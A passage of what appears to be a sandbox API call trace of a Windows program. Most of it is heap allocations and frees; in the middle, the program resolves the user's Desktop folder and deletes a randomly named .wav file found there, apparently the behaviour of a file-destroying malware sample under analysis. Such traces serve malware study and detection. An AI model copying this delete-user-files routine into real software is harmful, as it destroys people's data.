dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0100.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0100.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0100.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0100.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0100.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0100.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0100.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0100.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0100.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75240 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.164] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0100.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0100.165] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.165] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa62c8 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0100.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75678 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa62c8 | out: hHeap=0x2af0000) returned 1 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c) returned 0x2a68440 [0100.166] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/EkLB 1ywsMV77uH53.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav", lpFilePart=0x8cedf4*="EkLB 1ywsMV77uH53.wav") returned 0x2d [0100.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.166] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\eklb 1ywsmv77uh53.wav")) returned 0x20 [0100.166] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 0x9a3b80 [0100.166] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\EkLB 1ywsMV77uH53.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\eklb 1ywsmv77uh53.wav")) returned 1 [0100.207] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 0 [0100.207] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75678 | out: hHeap=0x2af0000) returned 1 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.207] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0100.207] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0100.208] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.209] 